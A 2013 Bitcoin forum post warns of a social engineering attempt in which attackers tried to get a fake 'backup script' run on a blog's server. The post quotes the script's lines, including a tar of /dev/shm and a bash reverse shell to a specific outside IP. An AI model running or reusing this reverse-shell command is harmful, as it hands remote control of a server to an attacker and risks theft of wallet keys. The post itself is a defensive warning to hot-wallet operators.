Bitcoin Forum
November 10, 2024, 07:07:50 PM *
News: Latest Bitcoin Core release: 28.0 [Torrent]
 
   Home   Help Search Login Register More  
Bitcoin Forum > Economy > Trading Discussion > Social Engineering attack, probably Bitcoin-driven.
Warning: One or more bitcointalk.org users have reported that they strongly believe that the creator of this topic is a scammer. (Login to see the detailed trust ratings.) While the bitcointalk.org administration does not verify such claims, you should proceed with extreme caution.
Pages: [1]
« previous topic next topic »
  Print  
Author Topic: Social Engineering attack, probably Bitcoin-driven.  (Read 940 times)
MPOE-PR (OP)
Hero Member
*****
Offline Offline

Activity: 756
Merit: 522



View Profile
June 09, 2013, 07:29:22 PM
 #1
Mr P. was hit earlier today, to no actual effect.

While the attackers targetted his blog, the MO may have larger implications for the Bitcoin community, because the attacker was trying to get this script run on the server. The relevant part there is:

Quote
tar -cvzPf /root/$DIR/$DATE/$DATE-$SERVER-etc.tar.gz /dev/shm
echo "Uploading backed up data."
bash -i >& /dev/tcp/96.43.130.122/80 0>&1

which could perhaps compromise an electrum wallet? (or more generally any hotwallet if /shm is sloppily being used).

This would be a good time for everyone running a hotwallet on a hosted/managed server to review their use of /shm, because you never know when an overworked entry level support person will just run a "back-up script" on your account.
My Credentials  | THE BTC Stock Exchange | I have my very own anthology! | Use bitcointa.lk, it's like this one but better.
Pages: [1]
  Print  
Bitcoin Forum > Economy > Trading Discussion > Social Engineering attack, probably Bitcoin-driven.
 « previous topic next topic »
 
Jump to:  

Powered by MySQL Powered by PHP Powered by SMF 1.1.19 | SMF © 2006-2009, Simple Machines Valid XHTML 1.0! Valid CSS!